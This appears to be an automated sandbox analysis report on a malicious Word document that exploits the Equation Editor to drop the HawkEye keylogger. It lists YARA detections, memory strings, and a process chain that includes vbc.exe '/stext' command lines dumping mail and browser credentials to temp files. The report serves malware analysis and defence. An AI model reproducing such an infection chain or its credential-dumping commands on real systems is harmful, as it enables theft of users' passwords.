Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042CE68
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042CE20
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F845C1
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F87197
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F8E540
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F848B0
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F82C98
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F8CC60
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F88BD8
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F89F30
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F86B18
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F87708
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F871EE
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F83CE0
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F890A0
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F848A1
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F8908B
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F82C77
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F87C60
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F87C51
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F80048
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F89016
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F89001
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F80006
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F8AFE8
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F88F72
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F88F5D
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F82F48
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F88310
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F876F9
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F84E98
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F84E88
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F86A19
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_009C20B0
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_00369418
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_00369840
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_003672A0
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_0036BB30
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_0036A318
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_00367B70
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_0036C171
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_003625AB
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_00366F58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404F4E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00404419
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00404516
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00413538
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_004145A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_0040E639
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_004337AF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_004399B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_0043DAE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00405CF6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00403F85
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00411F99

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\InstallUtil.exe 815FD29D891CB94418BB0CDC44D5095230989FE9DA58421319FCD57E458E39A9

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00413F8E appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00413E2D appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00442A90 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 004141D6 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00411538 appears 35 times

Source: 5.2.InstallUtil.exe.760000.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.520000.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3bf5fa2.10.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3bf5fa2.10.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3ba013d.9.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3ba013d.9.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.2364e0c.8.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.2369440.10.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.235347c.9.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.235347c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2378132295.0000000000760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2377939317.0000000000520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs

Base64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', 'KW6e4Q5ZCaUw4XJT+/pc7QJpS0uY+pOwmwmEpvxymYxwn2W7nNi5ezG89i79QHN1', 'Y4lMeblLw2h8wTPaKsDwMooDJZZkBFOSSQuWrnciliix1jss1hxI1XqYVt/LrdOi', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@10/14@7/3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$w Updated 20210810.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC706.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\name.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

System information queried: HandleInformation

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\name.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, vbc.exe, 00000007.00000002.2174054080.0000000000400000.00000040.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: New Updated 20210810.doc

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
Source: C:\Users\user\AppData\Roaming\name.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
Source: C:\Users\user\AppData\Roaming\name.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
